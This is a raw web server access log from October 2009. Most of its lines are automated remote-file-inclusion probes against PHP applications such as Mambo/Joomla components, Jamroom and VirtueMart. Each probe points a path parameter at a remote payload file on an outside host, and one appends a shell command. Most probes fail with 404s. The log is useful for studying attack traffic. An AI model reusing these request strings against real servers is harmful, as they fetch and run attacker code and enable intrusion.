82.193.15.3 - - [17/Oct/2009:04:27:39 -0400] "GET /logs/access_log.Q109090700%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:04:27:40 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:27:42 -0400] "GET /logs/access_log.Q109090100%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:27:47 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:27:47 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:27:47 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:27:48 -0400] "GET /logs/access_log.Q109090100/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:27:52 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:27:52 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:27:53 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:04:27:55 -0400] "GET /logs/error_log.Q109090700%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:28:04 -0400] "GET /logs/access_log.Q109090100/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:28:04 -0400] "GET /logs/access_log.Q109090100%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:04:28:25 -0400] "GET /logs/access_log.Q109072900%20%20/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:04:28:25 -0400] "GET /logs/access_log.Q109090900%20%20/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.219.198.195 - - [17/Oct/2009:04:28:37 -0400] "GET /logs/access_log.Q109062400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ownzz.netai.net/idzim?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
93.190.49.3 - - [17/Oct/2009:04:28:55 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:28:55 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:28:55 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:28:56 -0400] "GET /logs/access_log.Q109090100/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:29:44 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:29:44 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:29:45 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:29:52 -0400] "GET /logs/access_log.Q109090100/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.219.198.195 - - [17/Oct/2009:04:29:55 -0400] "GET /logs/error_log.Q109062400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
218.219.198.195 - - [17/Oct/2009:04:29:55 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
218.219.198.195 - - [17/Oct/2009:04:30:04 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
202.131.226.52 - - [17/Oct/2009:04:30:29 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ihent.ru//id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
202.131.226.52 - - [17/Oct/2009:04:30:29 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ihent.ru//id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.131.226.52 - - [17/Oct/2009:04:30:29 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ihent.ru//id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
202.131.226.52 - - [17/Oct/2009:04:30:36 -0400] "GET /logs/access_log.Q109090100/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ihent.ru//id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:31:27 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:31:27 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:31:27 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:31:29 -0400] "GET /logs/access_log.Q109090100/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.219.198.195 - - [17/Oct/2009:04:31:46 -0400] "GET /logs/access_log.Q109062400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt???? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
209.59.12.99 - - [17/Oct/2009:04:31:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.78.230 - - [17/Oct/2009:04:32:06 -0400] "GET /logs/ HTTP/1.0" 200 22188 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.193.15.3 - - [17/Oct/2009:04:32:13 -0400] "GET /logs/error_log.Q109052800%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.236.207.2 - - [17/Oct/2009:04:33:36 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://webmail.c.earthlink.net/wam/msg.jsp?msgid=26222&folder=INBOX&isSeen=false&x=-1072722230" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
121.124.127.164 - - [17/Oct/2009:04:34:22 -0400] "GET /logs/access_log.Q109090900//e404.php?DOCUMENT_ROOT=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:34:22 -0400] "GET /logs/error_log.Q109071800//e404.php?DOCUMENT_ROOT=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.133.148.98 - - [17/Oct/2009:04:34:25 -0400] "GET /logs/access_log.Q109091700//includes/class_item.php?fileExtension=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:34:25 -0400] "GET //includes/class_item.php?fileExtension=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 222 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:34:25 -0400] "GET /logs//includes/class_item.php?fileExtension=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:34:26 -0400] "GET /logs/access_log.Q109081800//includes/class_item.php?fileExtension=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
88.227.61.166 - - [17/Oct/2009:04:34:57 -0400] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.akvaryumizmir.com/images/stories/food/tool20.dat?&list=1&cmd=id HTTP/1.1" 404 268 "-" "Microsoft URL Control - 6.00.8169"
211.239.157.203 - - [17/Oct/2009:04:35:01 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.239.157.203 - - [17/Oct/2009:04:35:01 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.239.157.203 - - [17/Oct/2009:04:35:01 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:35:02 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:35:02 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:35:02 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:35:04 -0400] "GET /logs/access_log.Q109090100/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:05 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:05 -0400] "GET /logs/access_log.Q109080200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:05 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:05 -0400] "GET /logs/access_log.Q109080200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:05 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:06 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:07 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:07 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:07 -0400] "GET /logs/access_log.Q109080200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:07 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:07 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:08 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:08 -0400] "GET /logs/access_log.Q109080200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:11 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:12 -0400] "GET /logs/access_log.Q109080200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:12 -0400] "GET /logs/access_log.Q109072400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:13 -0400] "GET /logs/access_log.Q109072400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:13 -0400] "GET /logs/access_log.Q109072400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:14 -0400] "GET /logs/access_log.Q109072400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:35:14 -0400] "GET /logs/access_log.Q109072400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.239.157.203 - - [17/Oct/2009:04:35:20 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:35:26 -0400] "GET /logs/error_log.Q109071800//e404.php?DOCUMENT_ROOT=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:35:26 -0400] "GET /logs/access_log.Q109090900//e404.php?DOCUMENT_ROOT=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:04:36:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.7.194.67 - - [17/Oct/2009:04:36:59 -0400] "GET /logs/access_log.Q109081800/?custompluginfile[]=http://www.alis-plus.com/README.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
66.7.194.67 - - [17/Oct/2009:04:37:00 -0400] "GET /?custompluginfile[]=http://www.alis-plus.com/README.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
66.7.194.67 - - [17/Oct/2009:04:37:00 -0400] "GET /logs/?custompluginfile[]=http://www.alis-plus.com/README.txt? HTTP/1.1" 200 22188 "-" "libwww-perl/5.831"
72.30.78.230 - - [17/Oct/2009:04:36:08 -0400] "GET /logs/access_log.Q109060900 HTTP/1.0" 200 4908335 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.230 - - [17/Oct/2009:04:37:03 -0400] "GET /logs/error_log.Q109101100 HTTP/1.0" 200 3906870 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.230 - - [17/Oct/2009:04:36:01 -0400] "GET /logs/access_log.Q109100600 HTTP/1.0" 200 6447504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.133.148.98 - - [17/Oct/2009:04:37:21 -0400] "GET /logs/access_log.Q109071100/common/db.php?commonpath=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 238 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:37:21 -0400] "GET /common/db.php?commonpath=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 211 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:37:21 -0400] "GET /logs/common/db.php?commonpath=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 216 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:37:22 -0400] "GET /logs/error_log.Q109092400/common/db.php?commonpath=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.814"
72.30.78.230 - - [17/Oct/2009:04:37:03 -0400] "GET /logs/error_log.Q109101100 HTTP/1.0" 200 3906870 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
93.174.0.17 - - [17/Oct/2009:04:37:26 -0400] "GET /logs/access_log.Q109080200%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:37:32 -0400] "GET /logs/access_log.Q109080200%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:37:33 -0400] "GET /logs/access_log.Q109080200%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:37:33 -0400] "GET /logs/access_log.Q109072400%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:37:34 -0400] "GET /logs/access_log.Q109080200%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:37:37 -0400] "GET /logs/access_log.Q109072400%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:37:40 -0400] "GET /logs/access_log.Q109072400%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:37:41 -0400] "GET /logs/access_log.Q109072400%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:37:44 -0400] "GET /logs/access_log.Q109080200%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
93.174.0.17 - - [17/Oct/2009:04:37:52 -0400] "GET /logs/access_log.Q109072400%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.100.181.217 - - [17/Oct/2009:04:38:32 -0400] "GET /logs/access_log.Q109072200/?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.100.181.217 - - [17/Oct/2009:04:38:32 -0400] "GET /logs/?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 22188 "-" "Mozilla/5.0"
61.100.181.217 - - [17/Oct/2009:04:38:33 -0400] "GET /?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.100.181.217 - - [17/Oct/2009:04:38:35 -0400] "GET /logs/access_log.Q109092500/?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
174.133.148.98 - - [17/Oct/2009:04:38:49 -0400] "GET /logs/access_log.Q109081800%20//includes/class_item.php?fileExtension=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.814"
72.30.78.230 - - [17/Oct/2009:04:39:02 -0400] "GET /logs/access_log.Q109100400 HTTP/1.0" 200 2972627 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.230 - - [17/Oct/2009:04:40:48 -0400] "GET /logs/error_log.Q109100400 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.193.15.3 - - [17/Oct/2009:04:41:04 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:04:41:16 -0400] "GET /logs/access_log.Q109090300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:04:41:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.78.230 - - [17/Oct/2009:04:42:03 -0400] "GET /logs/access_log.Q109060500 HTTP/1.0" 200 3718537 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.230 - - [17/Oct/2009:04:42:43 -0400] "GET /logs/error_log.Q109090400 HTTP/1.0" 200 2479685 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.230 - - [17/Oct/2009:04:42:50 -0400] "GET /logs/error_log.Q109090400 HTTP/1.0" 200 2479685 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.230 - - [17/Oct/2009:04:43:23 -0400] "GET /logs/error_log.Q109061300 HTTP/1.0" 200 2652213 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.230 - - [17/Oct/2009:04:43:31 -0400] "GET /logs/error_log.Q109061300 HTTP/1.0" 200 2652213 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.239.157.203 - - [17/Oct/2009:04:45:30 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.239.157.203 - - [17/Oct/2009:04:45:30 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.239.157.203 - - [17/Oct/2009:04:45:30 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
202.131.226.52 - - [17/Oct/2009:04:45:35 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ihent.ru//id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
202.131.226.52 - - [17/Oct/2009:04:45:35 -0400] "GET /logs/access_log.Q109090100%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ihent.ru//id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
24.205.165.104 - - [17/Oct/2009:04:45:39 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Win64; x64; .NET CLR 2.0.50727; SLCC1; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
211.239.157.203 - - [17/Oct/2009:04:45:42 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:04:46:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.78.230 - - [17/Oct/2009:04:46:19 -0400] "GET /logs/access_log.Q109091600 HTTP/1.0" 200 5618969 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
59.24.49.35 - - [17/Oct/2009:04:47:21 -0400] "GET /logs///vwar/backup/errors.php?error=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
